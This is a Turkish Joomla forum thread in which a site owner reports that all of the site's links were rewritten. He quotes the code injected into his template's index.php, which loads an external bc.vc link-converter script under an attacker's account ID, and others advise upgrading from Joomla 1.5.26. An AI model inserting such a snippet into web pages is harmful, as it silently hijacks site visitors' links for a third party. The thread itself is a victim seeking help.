PDA

Orijinalini görmek için tıklayınız : Sitemdeki bütün linkler tek bir adrese yönlendirilmiş



cavit
18-06-2013, 12:39
Merhaba,

1.5.26 sürümünü kullanıyorum. Sitemdeki bütün linklerin değiştirildiğini farkettim.
Son değişiklik yapılan dosyanın şablona ait index.php dosyası olduğunu tespit ettim.
Bu dosyayı yedekten yükleyince sorun çözüldü.
Veritabanında ya da kullanıcı tablosunda herhangi bir değişiklik olmamış.
.htaccess dosyasında da değişiklik yok.

Bilgisayarımda virüs koruması var ve sitede işlem yapacağım zaman da temiz bir şekilde sistemi açarak giriyorum.
FTP programı kullanmıyorum. Her defasında ftp kullanıcı adı ve şifremi yazarak giriş yapıyorum. Buna rağmen, bu dosyanın nasıl değiştirildiğini çözemedim. url satırına eklenen kodlarla, bunu yapmış olabilirler mi?
Ya da, sql injection ile bir php dosyası değiştirilebilir mi? Ftp şifresini bilmeye gerek kalmadan, bir dosya değiştirilebiliyor mu? index.php dosyama eklenen kodlar aşağıdadır :

<script type="text/javascript" src="<?php echo $templateUrl; ?>/script.js"></script>
<script type="text/javascript">
var accountID = 16878;
var adType = 'int';
var exclude_domains = ['izinsizdomain.com', 'bing.com'];
</script>
<script type="text/javascript" src="http://bc.vc/js/link-converter.js"></script>


Bu konuda yardımlarınızı bekliyorum. Teşekkür ederim.

angelaus
19-06-2013, 11:46
çünkü 1.5.26 dasınız ve artık güvende değilsiniz.

En kısa sürede 2.5.11 sürüme geçiş yapın

cavit
19-06-2013, 12:43
çünkü 1.5.26 dasınız ve artık güvende değilsiniz.

En kısa sürede 2.5.11 sürüme geçiş yapın
Ftp şifresi bilinmeden, bir php dosyasının nasıl değiştirildiğini öğrenmek istiyorum. Yöntemi merak ediyorum. Joomla olmayan bir sitede de bir php dosyası değiştirilebilir mi? Cevabınız evet'se, o zaman benim joomla sitemdeki dosyanın değiştirilmesinin joomla açığından kaynaklandığını nasıl söyleyebiliriz? User tablosu ile ilgili joomla açıklarını biliyorum da, bir php dosyasının değiştirilmesinin hangi açıktan kaynaklandığını öğrenmek istiyorum.

angelaus
19-06-2013, 13:21
elbette bu sadece joomla anadosyaları değil. kullandığınız eklenti sürümlerinden, sunucu izin ve haklarından. php mysql sürümleriniz de olabilir

BozTurk
23-06-2013, 11:52
cavit, internet üzerinde olan hangi sistem olursa olsun her zaman %100 güvenlik altında olamaz bu nedenle hiç bir sistem güncelleme ve önlemler alınmadığı sürece %100 güvenli değildir. eğer oyle olsaydı sistemlerin gelişmesi söz konusu olmazdı. bilgisayar dünyasındaki yazılım güncellemelerinin %90 ı kullanıcı bilgilerinin gizliliğini esas alınarak yapılmaktadır bu joomla yada bir başka sistemde olsa durum aynıdır. o nedenle internette bir deyim vardır. "güncel olun, güvende kalın"